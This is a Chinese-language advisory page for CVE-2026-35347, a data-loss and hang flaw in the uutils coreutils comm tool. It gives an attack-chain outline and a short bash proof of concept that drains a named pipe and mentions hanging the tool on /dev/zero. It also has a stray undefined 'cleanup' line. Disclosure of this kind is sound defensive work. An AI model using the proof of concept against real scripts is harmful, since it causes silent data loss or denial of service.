CVE-2026-35347 CVSS 4.4 中危

CVE-2026-35347 uutils coreutils comm工具数据丢失漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35347

漏洞类型

资源管理错误

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

uutils coreutils

漏洞概述

uutils coreutils中的comm工具存在安全漏洞。该工具在执行比较操作前，会错误地从非常规文件输入（如FIFO或管道）中消耗数据。`are_files_identical`函数在未验证文件类型的情况下直接读取路径内容，导致数据流在比较逻辑执行前被排空，从而引发静默数据丢失。此外，如果尝试从`/dev/zero`等无限流中预读取，该工具可能会无限期挂起。

技术细节

该漏洞的核心在于uutils coreutils项目中`comm`工具的文件预处理逻辑存在缺陷。为了优化性能，代码在进入主比较循环前，调用了`are_files_identical`函数来判断两个输入文件是否完全相同。然而，该函数的实现存在严重疏忽，它直接调用文件读取操作，而没有预先检查输入路径是否指向常规文件。
当输入源为FIFO（命名管道）或匿名管道时，这种盲目的读取操作会立即消耗管道缓冲区中的数据。由于这些数据已被`are_files_identical`函数读取并丢弃，后续实际的比较逻辑将无法获取这些数据，从而导致静默的数据丢失，用户可能无法察觉处理结果的不完整。
此外，如果输入路径指向类似`/dev/zero`这样的无限流设备，读取操作将陷入死循环，导致`comm`进程永久挂起，消耗系统资源，形成拒绝服务攻击。

攻击链分析

STEP 1

步骤1：识别目标

攻击者确认目标系统正在使用uutils coreutils，且脚本或用户使用了comm命令处理文件。

STEP 2

步骤2：准备恶意输入

攻击者创建一个FIFO（命名管道）或利用现有的管道机制，并准备向其写入数据；或者准备指向/dev/zero的路径。

STEP 3

步骤3：触发漏洞

诱导受害者或自动化脚本执行comm命令，将恶意构造的管道或设备文件作为输入参数。

STEP 4

步骤4：产生影响

comm工具调用are_files_identical函数预读数据，导致管道数据被排空（数据丢失）或读取无限流导致进程挂起（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-35347: Data loss in uutils comm utility

# Scenario 1: Data loss via FIFO (Named Pipe)
# Create a named pipe
PIPE_FILE=$(mktemp -u)
mkfifo "$PIPE_FILE"

# Write data to the pipe in background
echo "SensitiveDataLine" > "$PIPE_FILE" &

# Attempt to compare the pipe with a regular file using uutils comm
# The 'are_files_identical' function will drain the pipe before comparison
# resulting in 'SensitiveDataLine' being lost from the output.
echo "ExpectedContent" > /tmp/regular_file
echo "Running uutils comm on pipe..."
# Replace 'comm' with the actual uutils comm binary path if needed
uutils-comm "$PIPE_FILE" /tmp/regular_file

cleanup
rm -f "$PIPE_FILE" /tmp/regular_file

# Scenario 2: Denial of Service via Infinite Stream
# This command will cause the utility to hang indefinitely
# uutils-comm /dev/zero /tmp/regular_file

影响范围

uutils coreutils < 0.6.0

防御指南

临时缓解措施

由于该漏洞影响本地特定工具的使用，最直接的缓解措施是暂时避免对管道（FIFO）或设备文件使用uutils版本的comm命令。如果环境允许，可以暂时回退使用GNU coreutils提供的comm工具作为替代方案，直到完成补丁更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35347
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35347
3 Details https://www.cvedetails.com/cve/CVE-2026-35347/
4 VulDB https://vuldb.com/cve/CVE-2026-35347
5 Link https://github.com/uutils/coreutils/pull/9545
6 Link https://github.com/uutils/coreutils/releases/tag/0.6.0
7 Link https://github.com/uutils/coreutils/pull/9545

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表